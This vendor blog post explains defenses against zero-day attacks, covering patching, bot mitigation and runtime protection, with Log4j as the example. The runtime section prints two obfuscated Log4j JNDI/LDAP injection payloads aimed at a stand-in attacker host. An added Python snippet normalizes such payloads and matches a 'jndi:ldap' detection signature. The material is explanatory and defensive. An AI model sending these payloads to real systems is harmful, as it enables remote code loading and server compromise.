Defending Against Zero-Day Threats

PUBLISHED ON August 11, 2023
LAST UPDATED April 2, 2024

With the dynamic and complex nature of today’s technology landscape, zero-day threats are a significant and growing problem. Testing for vulnerabilities, keeping on top of vulnerability disclosures, identifying known vulnerabilities, and patching vulnerabilities is an epic and ongoing challenge. Layers of security, including at runtime, are essential.


What Is a Zero-Day Attack?

A zero-day vulnerability is a flaw the software creator has not yet identified. A zero-day attack exploits a zero-day vulnerability, leaving the software vendor “zero days” to issue a fix before it is exploited.

This is a clever description from an article in G2:

“Imagine you accidentally leave a rarely used window open in your home.

You don’t think anything of it until you notice things going missing. Thieves have been sneaking in and out of your house for days, availing themselves of your stuff using that neglected window. 

Zero-day attacks are exactly the same. Hackers find and exploit a vulnerability in your system before you know it exists. And until you find the bug, you can’t fix the problem.”

Notable named zero-day attacks include Heartbleed and Shellshock in 2014, WannaCry in 2017, and log4j in 2021.

What’s the extent of the zero-day problem? A recent Mandiant study found there were 55 exploited zero-day vulnerabilities in 2022, down from 81 exploited zero-days in 2021.

Time Is Not On Your Side

Time is of the essence in addressing zero-day exploits – and it’s almost impossible to keep up with the attackers on this front.

This year’s Verizon Data Breach Investigations Report included an analysis of Log4j, the dangerous zero-day vulnerability disclosed in late 2021. The report found that more than 32 percent of all Log4j scanning activity over the course of the year happened within 30 days of its release. This tells us that attackers act fast and often when a vulnerability is disclosed.

The report also points out that “this velocity is an interesting comparison versus organizations’ median time to patch, which is currently 49 days for critical vulnerabilities, a number that has stayed relatively consistent over the years.”

In addition, security company Check Point found that there were a whopping 830,000 attack attempts made within 72 hours of the Log4j vulnerability being revealed.

Finally, attackers quickly spinning up variants of zero-day exploits complicates the problem. For instance, there was a flood of Log4j variants in the hours and days after its release. This trend is making it increasingly difficult for security teams to keep up and mitigate zero-day attacks.

Best Practices for Addressing Zero-Day Vulnerabilities

Attackers have all the time in the world to hunt for vulnerabilities, and they move with lightning speed when they find one. There is no one perfect defense, but layers of defense make a big difference. Critical among these layers are patching, bot mitigation, and runtime protection.

Patching problems

Patching is key to addressing zero-day vulnerabilities, but also remains a struggle.

It’s best practice to establish a robust patch management policy and process, including regular vulnerability scanning and prioritization of critical patches. Also, ensure that all systems and software are properly configured to receive and apply patches automatically, where and when possible. Training and education for staff on patch management best practices and the importance of timely patching is also critically important.

Finally, organizations should regularly review and update their patch management strategy to ensure that it remains effective in the face of evolving threats and technologies.

All this is easier said than done. During a one-month period earlier this year, ThreatX identified attackers attempting to exploit a Shellshock vulnerability in approximately one-third of our customers. Keep in mind that this is a vulnerability that was disclosed nine years ago.

Why do so many struggle with these best practices? First, the process can be complex and time-consuming, especially in large or distributed environments. Second, there may be concerns about the potential impact of applying patches, such as downtime or compatibility issues with other software. Finally, some organizations may not have the necessary resources or expertise to effectively manage patching across their entire infrastructure.

Role of bots 

Bots play a central role in zero-day exploitation, making bot mitigation a critical part of addressing zero days. Criminals usually scan for systems that are vulnerable to zero-day vulnerabilities using bots, then also use bots to carry out attacks. 


Keep in mind that coarse-grained bot mitigation efforts can disrupt or degrade legitimate user experience. It’s long been known that the use of CAPTCHA to identify humans vs. bots leads to a sub-optimal customer experience. Advanced bots may also use headless browsers or impersonate legitimate users, which can easily defeat user-agent based detection and fool WAFs and web applications into thinking the attacking bots are, in fact, a normal human user. 


Real-time behavioral profiling and threat engagement techniques are critical to effective bot mitigation. Behavioral profiling looks at large volumes of contextual data, monitoring every request live from every user to characterize their behavior and map their intent. By seeing more transactions, the system can recognize a broader pattern much faster and automatically craft a complex behavioral signature to block the attack in real time. In addition to behavioral profiling, advanced threat engagement techniques, such as IP fingerprinting, interrogation, and tarpitting, help shed light on the “user’s” intent. 


Runtime protection

Protecting running applications and APIs is an important part of a layered defense against zero-day vulnerabilities, because it blocks attacks while giving teams time to address vulnerabilities – without trying to keep up with attackers jumping on vulnerabilities or spinning up variants at a lightning-fast pace.   

For instance, as security engineers responded to Log4j attacks and deployed fixes for multiple, quickly emerging attack variants in late 2021, the limitations of only observing HTTP request and response pairs became obvious.

While the HTTP requests provided a lot of information, it took security engineers longer than they wanted to understand what attackers were targeting, what techniques they were using, and how they were going about it.  

For example, the following two payloads are the same, but each uses different obfuscation techniques.  

If only looking at HTTP requests, you’d have to recognize the obfuscation to figure out what the attackers are trying to do.  

Payload 1:  

${${::-j}${::-n}${::-d}${::-i}: ${::-l}${::-d}${::-a}${::-p}: //somesitehackerofhell.com/z}  

Payload 2:  

${${lower:j}ndi:${lower:l} ${lower:d}a${lower:p}: //somesitehackerofhell.com/z}  

The goal of both payloads is to produce the string “jndi:ldap”, because the vulnerability lies in a lookup that contained “jndi:ldap”. In the first example, the attacker wraps each letter in a “${::-x}” default-value lookup to hide it. In the second example, the attacker wraps letters in the “lower” lookup function to hide them.

The Log4j vulnerability had many variations like this. Even with just the two examples above, you could mix and match, for example ${::-j}${lower:n} and so on.

However, on the runtime side, both previous payloads do the same thing. So, if you are identifying and blocking at runtime, you would stop the threat immediately, no matter how much attackers try to disguise the intent.  
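The point above, as an added illustration that is not ThreatX code: a signature applied to the request as received misses both payloads from the post, while the same signature applied after the two lookup forms shown in the post are resolved catches both, plus a constructed mix-and-match variant. The payload strings are the ones printed above; PAYLOAD_MIXED is an assumption built from the same two forms.

```python
import re

# Added example, not ThreatX code. Resolves the two Log4j lookup forms the post
# shows (${::-x} -> "x", ${lower:x} -> "x".lower()) so obfuscated variants
# collapse to one string before signature matching. Other lookups are left
# untouched; nothing is evaluated or fetched.

# Payload 1 and Payload 2 as printed in the post (spaces included).
PAYLOAD_1 = "${${::-j}${::-n}${::-d}${::-i}: ${::-l}${::-d}${::-a}${::-p}: //somesitehackerofhell.com/z}"
PAYLOAD_2 = "${${lower:j}ndi:${lower:l} ${lower:d}a${lower:p}: //somesitehackerofhell.com/z}"
# Constructed mix-and-match variant of the kind the post mentions.
PAYLOAD_MIXED = "${${::-j}${lower:N}di:${lower:L}${::-d}ap://somesitehackerofhell.com/z}"

_INNER = re.compile(r"\$\{([^${}]*)\}")      # innermost ${...}, nothing nested inside
_SIGNATURE = re.compile(r"jndi:ldap", re.I)  # the string the post says matters


def _resolve(body):
    # Plain text a single lookup body evaluates to, or None if unknown.
    if body.startswith("::-"):
        return body[3:]
    if body.startswith("lower:"):
        return body[6:].lower()
    return None


def normalize(payload, max_rounds=20):
    # Collapse innermost lookups, repeating for nesting; bounded so hostile
    # input cannot keep the loop spinning.
    for _ in range(max_rounds):
        changed = False
        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r
        payload = _INNER.sub(repl, payload)
        if not changed:
            break
    return payload


def raw_match(payload):
    # Naive check on the request as received (whitespace ignored).
    return _SIGNATURE.search(re.sub(r"\s+", "", payload)) is not None


def normalized_match(payload):
    # Same signature after lookups are resolved: catches all three variants.
    return raw_match(normalize(payload))
```

The resolver only knows the two forms on the page; anything it cannot resolve stays as-is, which is the gap a request-only rule set has to keep chasing and a runtime control does not.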

Defense in Depth

There is no zero-day silver bullet (sadly). But with a thoughtful, layered approach, teams can build a zero-day defense that provides effective protection without excessive whack-a-mole. 


About the Author

Jeremy Ventura

Jeremy Ventura is a cybersecurity professional, specializing in advising organizations on information security best practices. He has years of experience in vulnerability management, email security, incident response and security center operations. At ThreatX, he is responsible for the development and presentation of thought leadership across all areas of cybersecurity. Ventura is an industry leader that can regularly be seen in media, blog posts, podcasts and at speaking events. Previously, Ventura has worked at Gong, Mimecast, Tenable and IBM, among other security organizations. Ventura holds a Master’s Degree in Cybersecurity and Homeland Security.